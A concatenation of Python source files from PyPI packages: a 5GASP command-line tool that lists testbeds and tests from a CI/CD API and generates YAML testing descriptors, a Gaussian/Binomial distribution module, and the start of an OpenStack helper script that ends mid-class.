prompts.connection_points_information_prompt()
# Parse connection points information
tags_parser = ConnectionPointsParser(infer_tags_from_nsd)
existing_connect_points = tags_parser.connection_points
print("\nThe following NSDs can be used for inferring connection " +
"points:"
)
table = PrintAsTable(
header=["NSD's File Path", "NSD ID", "Inferred Connection Points"],
rows=[
[
nsd_file_path,
nsd_info["ns_id"],
"\n".join(nsd_info["connection_points"])
]
for nsd_file_path, nsd_info
in existing_connect_points.items()
]
)
table.print()
prompts.connection_point_keys(
list(existing_connect_points.values())[0]["connection_points"][0]
)
# 2. Ask the developer if he wishes to proceed
proceed = Confirm.ask(
"\nDo you wish to proceed with the Test Descriptor's creation?"
)
# Exit if the developer does not want to proceed
if not proceed:
return
# 3. Ask for the Testing Descriptor initial information
netapp_name = input("\n" + Constants.USER_PROMPTS.NETAPP_NAME.value)
ns_name = input(Constants.USER_PROMPTS.NS_NAME.value)
api_client = CICD_API_Client.CICDManagerAPIClient()
# Print table with the available testbeds
# List Testbeds
testbeds = _list_testbeds(
api_client=api_client,
print_info=True,
centered=True
)
# Prompt to choose a testbed
testbed_id = Prompt.ask(
"\nIn which testbed do you want to validate your Network " +
"Application?",
choices=[t["id"] for t in testbeds]
)
tests = _list_tests(
api_client=api_client,
testbed_id=testbed_id,
print_info=False
)
if not infer_tags_from_nsd:
text = Text("\nAs there was no NSD passed, there are no connection " +
"points to be inferred. You can enter them manually."
, style="bold")
console.print(text)
generator = TestingDescriptorGenerator(
connection_points=existing_connect_points if infer_tags_from_nsd else None,
netapp_name=netapp_name,
ns_name=ns_name,
testbed_id=testbed_id,
tests=tests,
output_filepath=output_filepath
)
generator.create_testing_descriptor()
@app.command()
def list_testbeds():
'''
List available testbeds
'''
api_client = CICD_API_Client.CICDManagerAPIClient()
# List Testbeds
testbeds = _list_testbeds(
api_client=api_client,
print_info=True
)
# Ask the user if he wishes to list the available test cases in each of
# the available testbeds
should_list_tests = Confirm.ask(
"\nDo you wish to list the available tests for one of these testbeds?",
)
# If the answer is 'yes'
if should_list_tests:
testbed_id = Prompt.ask(
"\nFor which testbed do you wish to list the available tests",
choices=[t["id"] for t in testbeds]
)
print(f"\nAvailable tests in testbed '{testbed_id}':\n")
_list_tests(
api_client=api_client,
testbed_id=testbed_id,
print_info=True
)
@app.command()
def list_available_tests():
'''
List available tests to developer
'''
prompts.tests_per_testbed_prompt()
# Print all the available testbeds
prompts.tests_testbeds_list_prompt()
ApiClient = CICD_API_Client.CICDManagerAPIClient()
# List Testbeds
testbeds = _list_testbeds(
api_client=ApiClient,
print_info=True,
centered=True
)
# Prompt to choose a testbed
testbed_id = Prompt.ask(
"\nFor which testbed do you wish to list the available tests",
choices=[t["id"] for t in testbeds]
)
# List testbed's available tests
tests = _list_tests(
api_client=ApiClient,
testbed_id=testbed_id,
print_info=False
)
while True:
panels = PrintAsTable(
header=["ID", "Test Name", "Test Description"],
rows=[
[str(i+1), tests[i].name, tests[i].description]
for i
in range(len(tests))
]
)
prompts.display_tests_for_testbed(testbed_id)
panels.print()
# Does the user wishes to see additional tests information?
prompts.do_you_wish_to_see_test_information_prompt()
test_details = Prompt.ask(
"For which test do you wish to see additional information? ",
choices=[str(i) for i in range(1, len(tests)+1)] + ["exit"]
)
if test_details == "exit":
break
panels = PrintAsPanelColumns(
panels=[tests[int(test_details)-1].to_panel(expand=True)]
)
panels.print()
@app.callback()
def main(
verbose: bool = False,
ci_cd_manager_url: str = typer.Option(
default=Constants.CI_CD_SERVICE_URL,
help="CI/CD Manager URL to override the default one."
)
):
if verbose:
print("Will write verbose output")
state["verbose"] = True
# Set the ci_cd_manager_url
Constants.CI_CD_SERVICE_URL = ci_cd_manager_url
if __name__ == "__main__":
app() | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/main.py | main.py |
from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich.align import Align
from rich.console import Group
from ..helpers.connection_point_tags import CONNECTION_POINT_TAGS
from ..helpers.beatiful_prints import PrintAsTable
from rich.prompt import Prompt
def test_cases_operation():
prompt = Text()
console = Console()
prompt.append("\nWhich Operation do you want to perform?\n")
prompt.append("(add) ", style="bold")
prompt.append("Add new Test Case\n")
prompt.append("(info) ", style="bold")
prompt.append("Get more information regarding a Test\n")
prompt.append("(show) ", style="bold")
prompt.append("Show already configured Test Cases\n")
prompt.append("(edit) ", style="bold")
prompt.append("Edit Test Cases\n")
prompt.append("(finish) ", style="bold")
prompt.append("Finish the Test Cases Configuration\n")
console.print(prompt)
operation = Prompt.ask(
"Which Operation do you want to perform? ",
choices=["add", "info", "show", "edit", "finish"]
)
return operation
def tests_per_testbed_prompt():
console = Console()
group = Group(
Align.center("[b]In 5GASP, each testbed has its own specific " +
"tests.[/b]"),
Align.center(" "),
Align.center("Thus, we don't provide and overall view of the tests " +
"we have in our ecosystem, but rather a testbed-level " +
"view of the tests."),
Align.center("[b]This way, you must first choose a testbed on where " +
"yourNetApp shall be deployed, valdiated and " +
"certified.[/b]"),
Align.center("Only after choosing the testbed you may list the " +
"tests available in that facility."),
)
console.print(
Align.center(
Panel(
renderable=group,
title="5GASP's Tests",
expand=True
)
)
)
def tests_testbeds_list_prompt():
console = Console()
console.print(
Align.center(
"\n[b]Testbeds Available for Network Applications Testing:[/b]\n"
)
)
def display_tests_for_testbed(testbed):
console = Console()
console.print(
"\n[b]" +
f"The Testbed '{testbed}' provides the following tests:".title() +
"[/b]\n"
)
def do_you_wish_to_see_test_information_prompt():
console = Console()
console.print(
"\n[b]You can see additional information about each of the tests.\n" +
"If you don't want to do so, just type 'exit'.[b]"
)
def connection_points_information_prompt():
console = Console()
group = Group(
Align.center("[b]5GASP's CLI only supports inferring " +
"connection points when they refer to a VNF.[/b]"),
Align.center(" "),
Align.center("We currently do not support CNF-related connection " +
"points."),
Align.center("If you want to create a Testing Descriptor for a " +
"CNF-based Network Application, please contact us at " +
"[b][email protected][/b], and we will support your " +
"though the development of your Testing Descriptor."
),
)
console.print(
Align.center(
Panel(
renderable=group,
title="Connection Points",
expand=True
)
)
)
def connection_point_keys(example_connection_point):
console = Console()
group = Group(
Align.center("[b]From the previously presented Connection Points it " +
"is possible to define several template tags that " +
"shall be rendered after the deployment of the Network " +
"Application.[/b]"),
Align.center(" "),
Align.center("For instance, if a developer wishes to perform a " +
"test that requires information on the IPs of the " +
"Network Application VNFs, the devoloper may define a " +
"template tag, which will be rendered to the IP of a " +
"certain VNF " +
"({{<ns_id>|<vnf_id>|<connection_point>|ip-address}})."),
Align.center(" "),
)
print()
console.print(
Align.center(
Panel(
renderable=group,
title="Connection Points - Template Tags",
expand=True
)
)
)
print("\nThe available template tags are the following:")
tmp_example_connection_point = example_connection_point[:-2]
header = ["Connection Point Key", "Description", "Example",
"Example Value"]
rows = []
for tag, info in CONNECTION_POINT_TAGS.items():
rows.append(
[
tag,
info["description"],
tmp_example_connection_point + "|" + tag + "}}",
str(info["example"])
]
)
print_as_table = PrintAsTable(header=header, rows=rows)
print_as_table.print() | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/helpers/prompts.py | prompts.py |
import yaml
from typing import List
class ConnectionPointsParser:
"""
Injected Tags Parser Class
"""
validated_connection_points = None
_interfaces = None
def __init__(self, nsd_filepaths: List[str]):
"""
Constructor
"""
self.base_nsd_filepaths = set(nsd_filepaths)
self.validated_connection_points = {}
self._interfaces = []
self.infer_connection_points()
def infer_connection_points(self):
for filepath in self.base_nsd_filepaths:
self.parse_descriptor(filepath)
def parse_descriptor(self, nsd_filepath):
'''
Retrieves all the tags from the given descriptor
'''
try:
connection_points = []
with open(nsd_filepath, "r") as file:
descriptor = yaml.safe_load(file)
for network_service in descriptor['nsd']['nsd']:
ns_id = network_service['id']
for df in network_service['df']:
connection_points += self.infer_connection_points_from_df(
ns_id=ns_id,
df=df,
)
# save connection points
self.validated_connection_points[nsd_filepath] = {
"ns_id": ns_id,
"connection_points": connection_points
}
except Exception as e:
print("\nThe following exception occurred when trying to infer " +
f"connection points for the NSD '{nsd_filepath}': {e}.")
def infer_connection_points_from_df(self, ns_id, df):
connection_points = []
for vnf in df['vnf-profile']:
vnf_id = vnf['id']
for constituent in vnf['virtual-link-connectivity']:
for constituent_cpd in constituent["constituent-cpd-id"]:
interface_id = constituent_cpd['constituent-cpd-id']
connection_points.append(
"{{deployment_info|" + f"{ns_id}|{vnf_id}|" +
f"{interface_id}" + "}}"
)
return connection_points
@property
def connection_points(self):
'''
Get interfaces
'''
return self.validated_connection_points | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/DescriptorParser/parser.py | parser.py |
# OS
import os
from ..helpers.beatiful_prints import PrintAsTable, PrintAsPanelColumns
from ..helpers import prompts
import yaml
from rich.prompt import Prompt, FloatPrompt, IntPrompt, Confirm
from rich.text import Text
from rich.console import Console
from ..CICDManagerAPIClient.test_classes import TestCase
from ..helpers.connection_point_tags import CONNECTION_POINT_TAGS
from ..helpers.base_testing_descriptor import BASE_TESTING_DESCRIPTOR
class TestingDescriptorGenerator:
def __init__(self, netapp_name, ns_name, testbed_id, tests,
output_filepath, connection_points=None):
self.netapp_name = netapp_name
self.ns_name = ns_name
self.testbed_id = testbed_id
self.tests = tests
self.output_filepath = output_filepath
self.connection_points = connection_points
self.test_cases = []
self.tests_cases_ids_ordered_by_user = []
self.last_test_id = 1
def _show_test_info(self):
test_id = Prompt.ask(
"For which test do you wish to see additional information? ",
choices=[str(i) for i in range(1, len(self.tests)+1)]
)
panels = PrintAsPanelColumns(
panels=[self.tests[int(test_id)-1].to_panel(expand=True)]
)
panels.print()
def __test_variable_input(self, test_variable):
value = None
prompt = "Which value would you like to assign to the variable "\
f"'{test_variable.name}'?"
if test_variable.can_be_injected_by_the_nods and self.connection_points:
connection_points = []
connection_point_keys = list(CONNECTION_POINT_TAGS.keys())
for cps in self.connection_points.values():
connection_points += cps["connection_points"]
# Prepare table printing
tmp_smaller_list = connection_points \
if len(connection_points) < len(connection_point_keys) \
else connection_point_keys
diff = abs(len(connection_points) - len(connection_point_keys))
tmp_smaller_list += [" "]*diff
# Print Connection Points
panels = PrintAsTable(
header=["Connection Points", "Connection Point Keys"],
rows=[
[connection_points[i], connection_point_keys[i]]
for i
in range(len(connection_points))
]
)
panels.print()
# Ask for user's input
# If there are possible values, ask for one of them
if len(test_variable.possible_options) != 0:
value = Prompt.ask(prompt, choices=test_variable.possible_options)
elif test_variable.type == "str":
value = Prompt.ask(prompt)
elif test_variable.type == "float":
value = FloatPrompt.ask(prompt)
elif test_variable.type == "int":
value = IntPrompt.ask(prompt)
console = Console()
variable_value_text = Text(f"{test_variable.name} = {value}\n",
style="red")
console.print(variable_value_text)
return value
def _add_test(self):
console = Console()
test_id = Prompt.ask(
"Which test do you want to add to your Testing Descriptor? ",
choices=[str(i) for i in range(1, len(self.tests)+1)]
)
test_id = int(test_id) - 1
test = self.tests[test_id]
test_info = Text()
test_info.append(f"Configuring test '{test.name}'...\n", style="bold")
test_info.append("Test name: ", style="bold")
test_info.append(test.name + "\n")
test_info.append("Test Description: ", style="bold")
test_info.append(test.description + "\n")
test_info.append("\nConfiguring Test Variables...\n", style="bold")
console.print(test_info)
test_id = int(test_id) - 1
# Save Test Case Definition
test_case = TestCase(test=test, test_case_id=self.last_test_id)
for test_variable in test.test_variables:
console.print(
test_variable.to_panel(test.name)
)
if test_variable.can_be_injected_by_the_nods and self.connection_points:
text = Text("This variable can be injected by the " +
"NODS. You may rely on the inferred " +
"connection points..", style="bold")
console.print(text)
else:
text = Text("This variable can be injected by the " +
"NODS, but no NSD was passed. You can inject the" +
" values mannualy, or you can pass a descriptor" +
" to the CLI.", style="bold")
console.print(text)
value = self.__test_variable_input(test_variable)
# Save Test Case Definition
test_case.add_test_variable(
key=test_variable.name,
value=value
)
description = Prompt.ask("How would you describe this Test Case")
test_case.description = description
console.print(test_case.to_panel(show_configured=True))
self.test_cases.append(test_case)
self.last_test_id += 1
def _show_test_cases(self):
# Print Header
console = Console()
header = Text("\nYou already configured the following Test Cases:",
style="bold")
console.print(header)
# Print all configured Test Cases
panels = [tc.to_panel(expand=False) for tc in self.test_cases]
panel_columns = PrintAsPanelColumns(panels)
panel_columns.print()
def _finish_test_cases_definition(self):
console = Console()
info = Text("\nYou have finished the Test Cases Definition.\n")
info.append("You can now choose if your Test Cases should be " +
"executed in a specific order, or if the execution " +
"order is irrelevant.", style="bold")
console.print(info)
execution_order_is_required = Confirm.ask(
"\nDo you wish to execute the defined Test Cases in a specific " +
"order?"
)
if execution_order_is_required:
self._set_tests_execution_order()
else:
self.tests_cases_ids_ordered_by_user = [
tc.test_case_id
for tc
in self.test_cases
]
def _set_tests_execution_order(self):
self._show_test_cases()
# Print Header
console = Console()
header = Text("\nYou can now define the execution order of the " +
"configured Test Cases.\nTo do so, please keep " +
"choosing the next test that shall be executed, until " +
"you have chosen all Test Cases.", style="bold"
)
console.print(header)
# Initial Test Cases IDs
test_cases_ids = sorted([tc.test_case_id for tc in self.test_cases])
tests_cases_ids_ordered_by_user = []
while len(test_cases_ids) > 0:
test_case_id = Prompt.ask(
"Which is the next Test Case to execute? ",
choices=[str(i) for i in test_cases_ids]
)
test_case_id = int(test_case_id)
tests_cases_ids_ordered_by_user.append(test_case_id)
test_cases_ids.remove(test_case_id)
test_cases_ids = sorted(test_cases_ids)
# Present Test Cases Execution Order to the User
order_info = Text("\nThe Test Cases will be performed according " +
"to the following order: ", style="bold")
order_info.append(str(tests_cases_ids_ordered_by_user), style="red")
console.print(order_info)
self.tests_cases_ids_ordered_by_user = tests_cases_ids_ordered_by_user
return tests_cases_ids_ordered_by_user
def _edit_test_cases_delete(self):
test_id = Prompt.ask(
"Which Test Case do you want to delete ('back' to go " +
"back to the previous menu)?",
choices=[str(tc.test_case_id) for tc in self.test_cases] +
["back"],
)
if test_id == "back":
return
delete = Confirm.ask("Are you sure you want to delete the " +
f"Test Case with the ID {test_id}?"
)
# Delete the Test Case
if delete:
for tc in self.test_cases:
if str(tc.test_case_id) == test_id:
del self.test_cases[self.test_cases.index(tc)]
break
def _edit_test_cases_edit(self):
console = Console()
test_id = Prompt.ask(
"Which Test Case do you want to edit ('back' to go " +
"back to the previous menu)?",
choices=[str(tc.test_case_id) for tc in self.test_cases] +
["back"],
)
if test_id == "back":
return
# gather the test case
test_case = None
for tc in self.test_cases:
if str(tc.test_case_id) == test_id:
test_case = tc
break
console.print(Text("\nTest Case Information:", style="bold"))
panels = PrintAsPanelColumns(panels=[test_case.test.to_panel()])
panels.print()
console.print(Text("\nCurrent Test Case Definition:", style="bold"))
panels = PrintAsPanelColumns(
panels=[test_case.to_panel()]
)
panels.print()
for variable, value in test_case.test_variables.items():
info = Text()
info.append("\nTest Variable: ", style="bold")
info.append(variable + "\n")
info.append("Current Value: ", style="bold")
info.append(str(value) + "\n")
console.print(info)
edit = Confirm.ask("Do you want to edit this variable " +
f"({variable})?")
if edit:
# print Test Information
new_value = Prompt.ask("New Value")
test_case.add_test_variable(variable, new_value)
def _edit_test_cases(self):
# Print Header
self._show_test_cases()
show_test_cases = False
op = ""
while op != 'back':
op = Prompt.ask(
"Do you want to edit or delete a Test Case ('back' "
"to go back to the main menu)? ",
choices=["edit", "delete", "back"],
)
if op == "back":
break
elif op == "delete":
if show_test_cases:
self._show_test_cases()
self._edit_test_cases_delete()
elif op == "edit":
self._edit_test_cases_edit()
show_test_cases = True
def _test_cases_prompt(self):
panels = PrintAsTable(
header=["ID", "Test Name", "Test Description"],
rows=[
[str(i+1), self.tests[i].name, self.tests[i].description]
for i
in range(len(self.tests))
]
)
prompts.display_tests_for_testbed(self.testbed_id)
panels.print()
def _confirm_testing_descriptor_output_file(self):
console = Console()
location_ok = False
while not location_ok:
info = Text()
info.append("\nThe Testing Descriptor will be saved in the " +
"following file: ", style="bold")
info.append(self.output_filepath + "\n")
console.print(info)
change_filepath = Confirm.ask(
"Do you wish to save the Testing Descriptor in a different " +
"file?")
if not change_filepath:
location_ok = True
else:
file_path = Prompt.ask(
"Provide the file path where the Testing Descriptor " +
"should be saved ('back' to go back to the main menu)?")
if file_path == "back":
continue
elif os.path.isfile(file_path):
location_ok = True
self.output_filepath = file_path
elif os.path.isdir(file_path):
self.output_filepath = os.path.join(
file_path,
"testing-descriptor.yaml"
)
location_ok = True
else:
info = Text("\nImpossible to save the Testing Descriptor " +
"in the specified location " +
f"{file_path}! File or directory does not exist!",
style="red")
console.print(info)
#info = Text()
#info.append("\nThe Testing Descriptor will be saved in the " +
# "following file: ", style="bold")
#info.append(self.output_filepath + "\n")
#console.print(info)
return True
def _save_testing_decritptor(self):
testing_descriptor = BASE_TESTING_DESCRIPTOR
testing_descriptor["test_info"]["netapp_id"] = self.netapp_name
testing_descriptor["test_info"]["network_service_id"] = self.ns_name
testing_descriptor["test_info"]["testbed_id"] = self.testbed_id
testing_descriptor["test_info"]["description"] = "Testing "\
f"Descriptor for the {self.netapp_name} Network Application"
testcases = []
for tc in self.test_cases:
tc_dict = {
"testcase_id": tc.test_case_id,
"type": tc.test.test_type,
"scope": tc.test.test_type,
"name": tc.test.id,
"description": tc.description,
"parameters": []
}
for key, value in tc.test_variables.items():
tc_dict["parameters"].append(
{
"key": key,
"value": value
}
)
testcases.append(tc_dict)
testing_descriptor["test_phases"]["setup"]["testcases"] = testcases
testing_descriptor["test_phases"]["execution"][0]["executions"]\
[0]["testcase_ids"] = self.tests_cases_ids_ordered_by_user
with open(self.output_filepath, 'w') as output_file:
yaml.dump(
testing_descriptor,
output_file,
default_flow_style=False,
sort_keys=False
)
console = Console()
console.print(Text("\nGenerated Testing Descriptor:", style="bold"))
print(
yaml.dump(
testing_descriptor,
default_flow_style=False,
sort_keys=False
)
)
info = Text()
info.append("\nThe Testing Descriptor was saved in the " +
"following file: ", style="bold")
info.append(self.output_filepath)
console.print(info)
def _test_cases_menu(self):
while True:
# Show testcases
self._test_cases_prompt()
# Present the Menu to the developer
op = prompts.test_cases_operation()
if op == "add":
self._add_test()
if op == "show":
self._show_test_cases()
if op == "info":
self._show_test_info()
if op == "edit":
self._edit_test_cases()
if op == "finish":
self._finish_test_cases_definition()
if self._confirm_testing_descriptor_output_file():
break
def create_testing_descriptor(self):
self._test_cases_menu()
self._save_testing_decritptor() | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/TestingDescriptorGenerator/descriptor_generator.py | descriptor_generator.py |
import requests
from ..helpers import constants as Constants
from ..CICDManagerAPIClient.test_classes import Test
class CICDManagerAPIClient:
def __init__(self):
self.base_url = Constants.CI_CD_SERVICE_URL
def get_all_testbeds(self):
'''
Retrieves testbeds from the CI/CD Manager API.
Returns
-------
List of testbeds.
'''
# 1. List only the testbeds that have tests
response = self.__make_get_request(
Constants.CI_CD_SERVICE_URL +
Constants.CI_CD_SERVICE_URL_ENDPOINTS.ALL_TESTS.value
)
response_data = response.json()["data"]
testbeds_with_tests = response_data["tests"].keys()
# 2.Gather the testbeds description
response = self.__make_get_request(
Constants.CI_CD_SERVICE_URL +
Constants.CI_CD_SERVICE_URL_ENDPOINTS.ALL_TESTBEDS.value
)
response_data = response.json()["data"]
return [
testbed
for testbed
in response_data["testbeds"]
if testbed["id"] in testbeds_with_tests
]
def get_all_tests(self):
'''
Retrieves all tests from the CI/CD Manager API.
Returns
-------
List of all tests.
'''
path = Constants.ALL_TESTS_PATH
url = f"{self.base_url}/{path}"
try:
response = requests.get(url)
response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print(f"HTTP Error: {errh}")
return None
except requests.exceptions.ConnectionError as errc:
print(f"Connection Error: {errc}")
return None
except requests.exceptions.Timeout as errt:
print(f"Timeout Error: {errt}")
return None
except requests.exceptions.RequestException as err:
print(f"Unknown Error: {err}")
return None
else:
return response.json()['data']['tests']
def get_tests_per_testbed(self, testbed: str):
'''
Retrieves all testbeds from the CI/CD Manager API.
Parameters
----------
testbed : str
Testbed
Returns
-------
List of all testbeds.
'''
response = self.__make_get_request(
endpoint=Constants.CI_CD_SERVICE_URL +
Constants.CI_CD_SERVICE_URL_ENDPOINTS.ALL_TESTS.value,
params={"testbed": testbed}
)
tests = []
for test_info in response.json()['data']['tests'][testbed].values():
t = Test()
t.load_from_dict(test_info)
tests.append(t)
return tests
def __make_get_request(self, endpoint, params=None):
try:
response = requests.get(
url=endpoint,
params=params
)
response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print(f"HTTP Error: {errh}")
return None
except requests.exceptions.ConnectionError as errc:
print(f"Connection Error: {errc}")
return None
except requests.exceptions.Timeout as errt:
print(f"Timeout Error: {errt}")
return None
except requests.exceptions.RequestException as err:
print(f"Unknown Error: {err}")
return None
else:
return response | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/src/CICDManagerAPIClient/apli_client.py | apli_client.py |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Gaussian(Distribution):
""" Gaussian distribution class for calculating and
visualizing a Gaussian distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats extracted from the data file
"""
def __init__(self, mu=0, sigma=1):
Distribution.__init__(self, mu, sigma)
def calculate_mean(self):
"""Function to calculate the mean of the data set.
Args:
None
Returns:
float: mean of the data set
"""
avg = 1.0 * sum(self.data) / len(self.data)
self.mean = avg
return self.mean
def calculate_stdev(self, sample=True):
"""Function to calculate the standard deviation of the data set.
Args:
sample (bool): whether the data represents a sample or population
Returns:
float: standard deviation of the data set
"""
if sample:
n = len(self.data) - 1
else:
n = len(self.data)
mean = self.calculate_mean()
sigma = 0
for d in self.data:
sigma += (d - mean) ** 2
sigma = math.sqrt(sigma / n)
self.stdev = sigma
return self.stdev
def plot_histogram(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.hist(self.data)
plt.title('Histogram of Data')
plt.xlabel('data')
plt.ylabel('count')
def pdf(self, x):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
return (1.0 / (self.stdev * math.sqrt(2*math.pi))) * math.exp(-0.5*((x - self.mean) / self.stdev) ** 2)
def plot_histogram_pdf(self, n_spaces = 50):
"""Function to plot the normalized histogram of the data and a plot of the
probability density function along the same range
Args:
n_spaces (int): number of data points
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
mu = self.mean
sigma = self.stdev
min_range = min(self.data)
max_range = max(self.data)
# calculates the interval between x values
interval = 1.0 * (max_range - min_range) / n_spaces
x = []
y = []
# calculate the x values to visualize
for i in range(n_spaces):
tmp = min_range + interval*i
x.append(tmp)
y.append(self.pdf(tmp))
# make the plots
fig, axes = plt.subplots(2,sharex=True)
fig.subplots_adjust(hspace=.5)
axes[0].hist(self.data, density=True)
axes[0].set_title('Normed Histogram of Data')
axes[0].set_ylabel('Density')
axes[1].plot(x, y)
axes[1].set_title('Normal Distribution for \n Sample Mean and Sample Standard Deviation')
axes[0].set_ylabel('Density')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Gaussian distributions
Args:
other (Gaussian): Gaussian instance
Returns:
Gaussian: Gaussian distribution
"""
result = Gaussian()
result.mean = self.mean + other.mean
result.stdev = math.sqrt(self.stdev ** 2 + other.stdev ** 2)
return result
def __repr__(self):
"""Function to output the characteristics of the Gaussian instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}".format(self.mean, self.stdev) | 5kodds-distribution | /5kodds_distribution-0.1.tar.gz/5kodds_distribution-0.1/distributions/Gaussiandistribution.py | Gaussiandistribution.py |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
TODO: Fill out all functions below
"""
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
float: the p value
float: the n value
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
try:
assert self.p == other.p, 'p values are not equal'
except AssertionError as error:
raise
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}, p {}, n {}".\
format(self.mean, self.stdev, self.p, self.n) | 5kodds-distribution | /5kodds_distribution-0.1.tar.gz/5kodds_distribution-0.1/distributions/Binomialdistribution.py | Binomialdistribution.py |
# -*- coding: utf8 -*-
import getopt
import os
import sys
import re
import termios
import fcntl
import subprocess
import urllib2
import random
import time
import math
import traceback
import urllib
from prettytable import PrettyTable
import socket
try:
from keystoneclient.v2_0 import client as keystone_client
from cinderclient import client as cinder_client
from cinderclient import exceptions as cinder_exceptions
from heatclient import client as heat_client
from heatclient import exc as heat_exceptions
from neutronclient.neutron import client as neutron_client
from novaclient import client as nova_client
from novaclient import exceptions as nova_exceptions
from keystoneclient.auth.identity import v2 as keystoneIdentity
from keystoneclient import session as keystoneSession
import xmltodict
except ImportError, ie:
sys.stderr.write(ie.message+"\n")
sys.exit(1)
try:
# Python 2.7
from functools import wraps
except:
# Python 2.4
from backports.functools import wraps
CONF_DIR = '~/.5minute'
USER = os.environ["USER"]
DEBUG = False
DISABLE_CATCH = False
PROGRESS = None
# -----------------------------------------------------------
# Helpers functions
# -----------------------------------------------------------
def die(message, excode=1, exception=None):
"""
Print error message into srdErr
:param message: message
:param excode: exitcode
:param exception: exception for debugging mode
"""
global PROGRESS
if PROGRESS is not None:
progress(result="\x1b[31;01mFAIL\x1b[39;49;00m")
global DEBUG
if exception and DEBUG:
exc_type, exc_value, exc_traceback = sys.exc_info()
sys.stderr.write("\n\x1b[92;01m")
traceback.print_tb(exc_traceback)
sys.stderr.write("\x1b[39;49;00m\n")
sys.stderr.write("\n\x1b[31;01m%s\x1b[39;49;00m\n\n" % message)
sys.exit(excode)
def warning(message, answer=None):
"""
Print warning message into srdErr and may can for answer
:param message: message
:param answer: list of supported options. Default is first item.
"""
c = ""
sys.stderr.write("\n\x1b[92;01m%s " % message)
if answer:
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
try:
while 1:
try:
c = sys.stdin.read(1)
break
except IOError:
pass
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
c = (u"%s" % c).lower()
sys.stderr.write(" %s\x1b[39;49;00m\n\n" % c)
if answer:
for it in answer:
if c in it:
return c
return answer.pop(0)
def progress(title=None, result=None):
"""
Function for displaying of progress bar.
Example of using:
progress(title="Name of action")
for i in range(0, 30):
progress()
progress(result="GOOD")
"""
CHARS = ('.', '-', '=', '_')
global PROGRESS
if title:
PROGRESS = 0
sys.stdout.write("%s" % title.ljust(40, " "))
if result:
sys.stdout.write("%s\x1b[92;01m%s\x1b[39;49;00m\n" %
("\b" * (PROGRESS % 20), result.ljust(20, " ")))
PROGRESS = None
if title is None and result is None:
PROGRESS += 1
if PROGRESS % 20 == 0:
sys.stdout.write("\b" * 19)
PROGRESS += 1
sys.stdout.write(CHARS[int(math.ceil(PROGRESS / 20)) % len(CHARS)])
sys.stdout.flush()
def catch_exception(text=None, type=Exception):
""" Decorator for catch exception """
def decorate(func):
@wraps(func)
def wrapper(*args, **kwargs):
catch_message = text
try:
return func(*args, **kwargs)
except type as ex:
if not DISABLE_CATCH:
if catch_message is None:
catch_message = ex.message
die(catch_message, exception=ex)
else:
raise ex
return wrapper
return decorate
class disable_catch_exception:
